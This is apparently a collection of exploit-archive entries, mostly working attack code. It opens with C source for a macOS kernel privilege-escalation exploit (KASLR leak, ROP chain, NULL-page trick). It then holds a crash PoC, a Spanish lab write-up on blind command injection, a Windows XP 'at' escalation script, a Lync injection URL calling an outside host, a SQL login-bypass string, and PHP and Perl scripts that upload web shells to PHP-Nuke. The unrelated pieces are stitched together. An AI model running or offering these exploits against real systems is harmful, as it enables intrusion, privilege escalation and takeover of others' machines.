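    char offset_str[17];
    size_t got = fread(offset_str, 1, 16, f);
    pclose(f);
    if (got != 16) {
        fprintf(stderr, "short output from: %s\n", cmd);
        return 0;
    }
    offset_str[16] = '\x00';
    return strtoull(offset_str, NULL, 16);
}

/*
 * Unslid address of an exported kernel symbol, read from nm(1) on
 * /mach_kernel. `sym` is spliced into a shell command line: only the
 * hard-coded names used in build_vtable() may be passed here.
 * Returns 0 on failure.
 */
uint64_t kernel_symbol(char *sym)
{
    char cmd[1024];
    snprintf(cmd, sizeof(cmd), "nm -g /mach_kernel | grep %s | cut -d' ' -f1", sym);
    return read_hex_from_cmd(cmd);
}

/*
 * Unslid address, inside IONDRVSupport, of the pointer leaked through the
 * AAPL,iokit-ndrv registry property: the IONDRVFramebuffer vtable + 0x10.
 * Returns 0 on failure.
 */
uint64_t leaked_offset_in_kext(void)
{
    uint64_t offset = read_hex_from_cmd(
        "nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport"
        " | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1");
    if (offset == 0) {
        return 0;
    }
    offset += 0x10; // offset from symbol to leaked pointer
    return offset;
}

/*
 * Read the 8-byte AAPL,iokit-ndrv property from the IORegistry; it holds a
 * slid kernel pointer (the KASLR info-leak). Returns 0 on failure -- the
 * original returned 1, indistinguishable from a value.
 */
uint64_t leak(void)
{
    CFTypeRef p = IORegistryEntrySearchCFProperty(
        IORegistryGetRootEntry(kIOMasterPortDefault), kIOServicePlane,
        CFSTR("AAPL,iokit-ndrv"), kCFAllocatorDefault, kIORegistryIterateRecursively);
    if (p == NULL) {
        printf("AAPL,iokit-ndrv property not found\n");
        return 0;
    }
    if (CFGetTypeID(p) != CFDataGetTypeID()) {
        printf("expected CFData\n");
        CFRelease(p);
        return 0;
    }
    if (CFDataGetLength(p) != 8) {
        printf("expected 8 bytes\n");
        CFRelease(p);
        return 0;
    }
    uint64_t leaked;
    memcpy(&leaked, CFDataGetBytePtr(p), sizeof(leaked));
    CFRelease(p);
    return leaked;
}

extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);

/*
 * OSBundleLoadAddress of the loaded kext whose bundle id is target_name
 * (as reported by OSKextCopyLoadedKextInfo; main() treats it as unslid).
 * Returns 0 when the kext is not found or on allocation failure.
 */
uint64_t kext_load_addr(char *target_name)
{
    uint64_t addr = 0;
    CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
    if (kd == NULL) {
        return 0;
    }
    CFIndex count = CFDictionaryGetCount(kd);
    const void **keys = malloc(sizeof(void *) * count);
    const void **values = malloc(sizeof(void *) * count);
    if (keys == NULL || values == NULL) {
        free(keys);
        free(values);
        CFRelease(kd);
        return 0;
    }
    CFDictionaryGetKeysAndValues(kd, keys, values);

    for (CFIndex i = 0; i < count; i++) {
        CFStringRef ident = CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier"));
        // CFStringGetCStringPtr may legitimately return NULL; the original
        // passed that straight to strcmp()
        const char *name = ident ? CFStringGetCStringPtr(ident, kCFStringEncodingMacRoman) : NULL;
        if (name == NULL) {
            continue;
        }
        if (strcmp(name, target_name) == 0) {
            CFNumberRef n = CFDictionaryGetValue(values[i], CFSTR("OSBundleLoadAddress"));
            if (n != NULL) {
                CFNumberGetValue(n, kCFNumberSInt64Type, &addr);
            }
            printf("%s: 0x%016llx\n", name, (unsigned long long)addr);
            break;
        }
    }

    free(keys);
    free(values);
    CFRelease(kd);
    return addr;
}

/* Load address of IONDRVSupport (was a copy of kext_load_addr with the name inlined). */
uint64_t load_addr(void)
{
    return kext_load_addr("com.apple.iokit.IONDRVSupport");
}

/*
 * File offset of the first occurrence of pat in buf, or -1 with a message.
 * Adding the offset to the kernel base assumes __TEXT is mapped from file
 * offset 0 with no gap, which held for /mach_kernel on Mavericks.
 */
static int64_t find_gadget(const uint8_t *buf, size_t buf_len,
                           const uint8_t *pat, size_t pat_len, const char *what)
{
    const uint8_t *loc = memmem(buf, buf_len, pat, pat_len);
    if (loc == NULL) {
        fprintf(stderr, "%s gadget not found in /mach_kernel\n", what);
        return -1;
    }
    uint64_t off = (uint64_t)(loc - buf);
    printf("offset of %s gadget: 0x%llx\n", what, (unsigned long long)off);
    return (int64_t)off;
}

/*
 * Build the fake vtable / ROP stack. Gadgets are located by byte pattern in
 * the on-disk kernel and rebased by kaslr_slide; the chain drops the two
 * locks IOAcceleratorFamily2 holds, then calls KUNCExecute(payload, 0, 0)
 * (the kernel's "launch a user-space helper" entry point) and returns to
 * user mode via thread_exception_return.
 *
 * Writes the chain length to *len. Returns a malloc'd buffer the caller
 * frees, or NULL when the kernel cannot be read or any gadget/symbol is
 * missing (the original dereferenced NULL in those cases).
 */
uint64_t *build_vtable(uint64_t kaslr_slide, size_t *len)
{
    uint64_t kernel_base = 0xffffff8000200000ULL + kaslr_slide;

    int fd = open("/mach_kernel", O_RDONLY);
    if (fd < 0) {                       // open() returns -1, not 0, on failure
        perror("open /mach_kernel");
        return NULL;
    }
    struct stat _stat;
    if (fstat(fd, &_stat) != 0) {
        perror("fstat /mach_kernel");
        close(fd);
        return NULL;
    }
    size_t buf_len = (size_t)_stat.st_size;
    uint8_t *buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE | MAP_PRIVATE, fd, 0);
    if (buf == MAP_FAILED) {            // mmap() returns MAP_FAILED, not NULL
        perror("mmap /mach_kernel");
        close(fd);
        return NULL;
    }

    /* this stack pivot to rax seems to be reliably present across mavericks versions:
       push rax
       add [rax], eax
       add [rbx+0x41], bl
       pop rsp
       pop r14
       pop r15
       pop rbp
       ret
    */
    static const uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
    /* pop rdi ; ret */
    static const uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
    /* pop rsi ; ret */
    static const uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
    /* pop rdx ; ret */
    static const uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};

    int64_t pivot_off   = find_gadget(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes), "pivot");
    int64_t pop_rdi_off = find_gadget(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes), "pop_rdi_ret");
    int64_t pop_rsi_off = find_gadget(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes), "pop_rsi_ret");
    int64_t pop_rdx_off = find_gadget(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes), "pop_rdx_ret");

    munmap(buf, buf_len);
    close(fd);

    if (pivot_off < 0 || pop_rdi_off < 0 || pop_rsi_off < 0 || pop_rdx_off < 0) {
        return NULL;
    }
    uint64_t pivot       = kernel_base + (uint64_t)pivot_off;
    uint64_t pop_rdi_ret = kernel_base + (uint64_t)pop_rdi_off;
    uint64_t pop_rsi_ret = kernel_base + (uint64_t)pop_rsi_off;
    uint64_t pop_rdx_ret = kernel_base + (uint64_t)pop_rdx_off;

    /* in IOAcceleratorFamily2 two locks are held - r12 survives the pivot,
       this should unlock all the locks from there:

       __text:0000000000006F80    lea     rsi, unk_32223
       __text:0000000000006F87    mov     rbx, [r12+118h]
       __text:0000000000006F8F    mov     rax, [rbx]
       __text:0000000000006F92    mov     rdi, rbx
       __text:0000000000006F95    xor     edx, edx
       __text:0000000000006F97    call    qword ptr [rax+858h]
       __text:0000000000006F9D    mov     rdi, rbx        ; this
       __text:0000000000006FA0    call    __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
       __text:0000000000006FA5    mov     rdi, [rbx+88h]
       __text:0000000000006FAC    call    _IOLockUnlock
       __text:0000000000006FB1 loc_6FB1:                  ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
       __text:0000000000006FB1    xor     ecx, ecx
       __text:0000000000006FB3    jmp     loc_68BC
       ...
       __text:00000000000068BC    mov     eax, ecx        ; jumptable 00000000000067F1 default case
       __text:00000000000068BE    add     rsp, 38h
       __text:00000000000068C2    pop     rbx
       __text:00000000000068C3    pop     r12
       __text:00000000000068C5    pop     r13
       __text:00000000000068C7    pop     r14
       __text:00000000000068C9    pop     r15
       __text:00000000000068CB    pop     rbp
       __text:00000000000068CC    retn
    */
    uint64_t accel_base = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2");
    if (accel_base == 0) {
        fprintf(stderr, "IOAcceleratorFamily2 not loaded\n");
        return NULL;
    }
    uint64_t unlock_locks = accel_base + kaslr_slide + 0x6f80;   // offset is build-specific
    printf("0x%016llx\n", (unsigned long long)unlock_locks);

    uint64_t KUNCExecute = kernel_symbol("_KUNCExecute");
    uint64_t thread_exception_return = kernel_symbol("_thread_exception_return");
    if (KUNCExecute == 0 || thread_exception_return == 0) {
        fprintf(stderr, "could not resolve kernel symbols via nm\n");
        return NULL;
    }
    KUNCExecute += kaslr_slide;
    thread_exception_return += kaslr_slide;

    //char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
    char *payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";

    uint64_t rop_stack[] = {
        0,                              // pop r14
        0,                              // pop r15
        0,                              // pop rbp  +10
        unlock_locks,
        pivot,                          // +20  virtual call is rax+20
        0,                              // +10
        0,                              // +18
        0,
        0,                              // +28
        0,
        0,                              // +38
        0,                              // pop rbx
        0,                              // pop r12
        0,                              // pop r13
        0,                              // pop r14
        0,                              // pop r15
        0,                              // pop rbp
        pop_rdi_ret,
        (uint64_t)(uintptr_t)payload,   // KUNCExecute(path, 0, 0)
        pop_rsi_ret,
        0,
        pop_rdx_ret,
        0,
        KUNCExecute,
        thread_exception_return
    };

    uint64_t *r = malloc(sizeof(rop_stack));
    if (r == NULL) {
        perror("malloc");
        return NULL;
    }
    memcpy(r, rop_stack, sizeof(rop_stack));
    *len = sizeof(rop_stack);
    return r;
}

/*
 * Place the fake vtable at 0x41420000, map page zero holding a pointer to it,
 * then make IntelAccelerator map memory type 3 from user-client type 2: the
 * driver reads an object pointer that is NULL and follows it into the fake
 * vtable, which pivots into the ROP chain. Prints and returns early on any
 * setup failure; the map call itself does not return on success.
 */
void trigger(void *vtable, size_t vtable_len)
{
    kern_return_t err;

    // need to overallocate and touch the pages since this will be the stack:
    mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
    err = mach_vm_allocate(mach_task_self(), &addr, 0x20 * 0x1000, 0);   // flags 0: fixed address
    if (err != KERN_SUCCESS) {
        fprintf(stderr, "mach_vm_allocate(fake stack) failed: %d\n", err);
        return;
    }
    memset((void *)(uintptr_t)addr, 0, 0x20 * 0x1000);
    memcpy((void *)0x41420000, vtable, vtable_len);

    // map NULL page (the original passed a 64-bit mach_vm_address_t* where
    // vm_allocate wants a vm_address_t*)
    vm_deallocate(mach_task_self(), 0x0, 0x1000);
    vm_address_t zero_page = 0;
    err = vm_allocate(mach_task_self(), &zero_page, 0x1000, 0);
    if (err != KERN_SUCCESS || zero_page != 0) {
        fprintf(stderr, "could not map page zero: %d (got 0x%lx)\n", err, (unsigned long)zero_page);
        return;
    }
    // volatile so the compiler cannot drop the stores through a null pointer
    volatile char *np = 0;
    for (int i = 0; i < 0x1000; i++) {
        np[i] = 'A';
    }
    volatile uint64_t *zero = 0;
    *zero = 0x41420000;                 // first qword at NULL: the fake vtable pointer

    // trigger vuln
    CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
    io_iterator_t iterator;
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS) {
        fprintf(stderr, "IOServiceGetMatchingServices failed: %x\n", err);
        return;
    }
    io_service_t service = IOIteratorNext(iterator);
    IOObjectRelease(iterator);
    if (service == IO_OBJECT_NULL) {
        fprintf(stderr, "IntelAccelerator service not found\n");
        return;
    }

    io_connect_t conn = MACH_PORT_NULL;
    err = IOServiceOpen(service, mach_task_self(), 2, &conn);
    IOObjectRelease(service);
    if (err != KERN_SUCCESS) {
        fprintf(stderr, "IOServiceOpen(type 2) failed: %x\n", err);
        return;
    }

    addr = 0x12345000;
    mach_vm_size_t size = 0x1000;
    err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
    // only reached if the kernel is not vulnerable / the chain did not run
    printf("IOConnectMapMemory returned %x\n", err);
    IOServiceClose(conn);
}

/*
 * Derive the KASLR slide from the leaked IONDRVSupport pointer, build the
 * chain and fire. Returns 1 on any setup failure (leak missing, symbol
 * lookups failed, pointer/offset mismatch), 0 otherwise.
 */
int main(void)
{
    uint64_t leaked_ptr = leak();
    if (leaked_ptr == 0) {
        return 1;
    }

    uint64_t kext_base = load_addr();   // was `kext_load_addr`, shadowing the function
    if (kext_base == 0) {
        printf("could not find the IONDRVSupport load address\n");
        return 1;
    }

    // get the offset of that pointer in the kext:
    uint64_t offset = leaked_offset_in_kext();
    if (offset == 0) {
        printf("could not resolve __ZTV17IONDRVFramebuffer\n");
        return 1;
    }

    // sanity check the leaked address against the symbol addr (low 12 bits
    // survive the slide, so a mismatch means the leak is not what we expect):
    if ((leaked_ptr & 0xfff) != (offset & 0xfff)) {
        printf("the leaked pointer doesn't match up with the expected symbol offset\n");
        return 1;
    }

    uint64_t kaslr_slide = (leaked_ptr - offset) - kext_base;
    printf("kaslr slide: 0x%llx\n", (unsigned long long)kaslr_slide);

    size_t vtable_len = 0;
    uint64_t *vtable = build_vtable(kaslr_slide, &vtable_len);
    if (vtable == NULL) {
        return 1;
    }

    trigger(vtable, vtable_len);
    free(vtable);
    return 0;
}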
Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference
#include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <IOKit/IOKitLib.h> int main(){ kern_return_t err; CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator"); if(!matching){ printf("unable to create service matching dictionary\n"); return 0; } io_iterator_t iterator; err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator); if (err != KERN_SUCCESS){ printf("no matches\n"); return 0; } io_service_t service = IOIteratorNext(iterator); if (service == IO_OBJECT_NULL){ printf("unable to find service\n"); return 0; } printf("got service: %x\n", service); io_connect_t conn = MACH_PORT_NULL; err = IOServiceOpen(service, mach_task_self(), 2, &conn); if (err != KERN_SUCCESS){ printf("unable to get user client connection\n"); return 0; }else{ printf("got userclient connection: %x\n", conn); } mach_vm_address_t addr = 0x414100000000; mach_vm_size_t size = 0x1000; err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere); return 0; }
-
Blind OS command injection with out-of-band interaction – PortSwigger Write Up
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with out-of-band interaction”. Para resolver el laboratorio tenemos que ocasionar una búsqueda DNS al servidor público de Burp Suite (burpcollaborator.net). Para ello, haremos uso de un Blind OS Command Injection que se encuentra en la función de feedback. Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos: Ahora, antes de enviar el feedback, preparamos Burp Suite para que reciba las peticiones: Con esto listo, enviamos el feedback para captar la petición: Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al Repeater pulsando Ctrl+R: Una vez en el Repeater, podemos observar cómo una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más. Sin embargo, entre todos los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos y, con ello, realizar una búsqueda DNS al servidor de Burp Suite: Al realizar esta petición, si actualizamos la web, nos daremos cuenta de que hemos resuelto el reto: En este caso, sí que es cierto que lo mejor para realizar los retos estilo «out-of-band» es contar con Burp Suite PRO para poder hacer uso de la característica de Burp Collaborator client: De hecho, el siguiente y último reto de OS Command Injection (al menos a fecha de enero de 2021) no se puede resolver si no es con Burp Suite PRO 😥.
-
Microsoft Windows XP - 'tskill' Local Privilege Escalation
@echo off REM REM source: https://www.securityfocus.com/bid/48232/info REM REM Microsoft Windows is prone to a local privilege-escalation vulnerability. REM REM A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. REM Successful exploits will result in the complete compromise of affected computers. REM Failed exploit attempts may cause a denial-of-service condition. REM echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit start time /T > time.txt tskill explorer time 13:36:59 > nul at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y cls at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y echo [*] Backup time time < time.txt
-
Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection
source: https://www.securityfocus.com/bid/48235/info Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected. https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//
-
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection
source: https://www.securityfocus.com/bid/48233/info WebFileExplorer is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. WebFileExplorer 3.6 is vulnerable; other versions may also be affected. Supplying the following input to the username or password field is sufficient to exploit these issues: user: admin' or '1=1 pass: anything
-
PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)
source: https://www.securityfocus.com/bid/48257/info Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. Phpnuke 8.3 is vulnerable; other versions may also be affected. <?php /////////////////////////////////////////////////// #Iranian Pentesters Home #PHP Nuke 8.3 MT AFU Vulnerability #Coded by:4n0nym0us & b3hz4d #http://www.pentesters.ir /////////////////////////////////////////////////// //Settings: $address = 'http://your-target.com'; $file = 'shell.php.01'; $prefix='pentesters_'; //Exploit: @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"; @$file_data .= file_get_contents($file); file_put_contents($prefix . $file, $file_data); $file = $prefix . $file; echo "\n" . "///////////////////////////////////" ."\n"; echo " Iranian Pentesters Home" . "\n"; echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n"; echo "///////////////////////////////////" ."\n"; $address_c = $address . '/includes/richedit/upload.php'; $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1"); $data = post_data($address_c, $postdata); $start = strpos($data, "<img src=\"upload"); if ($start != null) { $data = substr($data,$start + 10); $end = strpos($data, "\""); $data = substr($data,0,$end); echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n"; } else echo "\n" . "Upload Failed!!!"; function post_data($address, $data) { $curl = curl_init($address); curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)"); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); $content = curl_exec($curl); curl_close($curl); return $content; } ?>
-
PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)
source: https://www.securityfocus.com/bid/48257/info Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. Phpnuke 8.3 is vulnerable; other versions may also be affected. #!/usr/bin/perl ################################################### #//Iranian Pentesters Home #//PHP Nuke 8.3 MT AFU Vulnerability #//Coded by:4n0nym0us & b3hz4d #//http://www.pentesters.ir ################################################### use LWP; use HTTP::Request::Common; print "\n" . "///////////////////////////////////" ."\n"; print " Iranian Pentesters Home" . "\n"; print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n"; print "///////////////////////////////////" ."\n"; print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n"; my $url = $ARGV[0]."/includes/richedit/upload.php"; my $filename = $ARGV[1]; my $prefix = $ARGV[2]; my $rfile = $prefix . $filename . ".gif"; open fhandle, $ARGV[1] or die $!; while (<fhandle>){ $shell .= $_; } close fhandle; open fhandle, ">", $rfile or die $!; print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell; close(fhandle); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026"); my $req = POST $url, Content_Type => 'form-data', Content => [ upload => "1", path => 'images', pwd => "1", userfile => [ $rfile,$prefix . $filename ] ]; my $res = $ua->request($req); $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12); print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between); exit;
-
PHP 5.3.6 - Security Bypass
source: https://www.securityfocus.com/bid/48259/info PHP is prone to a security-bypass vulnerability. Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks. PHP 5.3.6 is vulnerable; other versions may also be affected. HTTP Request: ==== POST /file-upload-fuzz/recv_dump.php HTTP/1.0 host: blog.security.localhost content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$ content-length: 200 ------------ThIs_Is_tHe_bouNdaRY_$ Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass"; Content-Type: text/plain any ------------ThIs_Is_tHe_bouNdaRY_$-- HTTP Response: ==== HTTP/1.1 200 OK Date: Fri, 27 May 2011 11:35:08 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Length: 30 Connection: close Content-Type: text/html /anything.here.slash-will-pass PHP script: =====
<?php
// Minimal receiver that shows what PHP hands the script for a multipart
// upload whose filename carries a leading slash (see the request above).
if (!empty($_FILES['contents'])) {
    // process file upload
    // 'name' is the filename exactly as the client sent it: in the request
    // above that is "/anything.here.slash-will-pass", and the response body
    // shows it echoed unchanged. NOTE(review): treat this value as untrusted
    // input — pass it through basename() and an allow-list before using it as
    // a path on disk, and through htmlspecialchars() before echoing it into
    // an HTML response (the response above is served as text/html).
    echo $_FILES['contents']['name'];
    // Discard the temporary upload; this script keeps nothing on disk.
    unlink($_FILES['contents']['tmp_name']);
}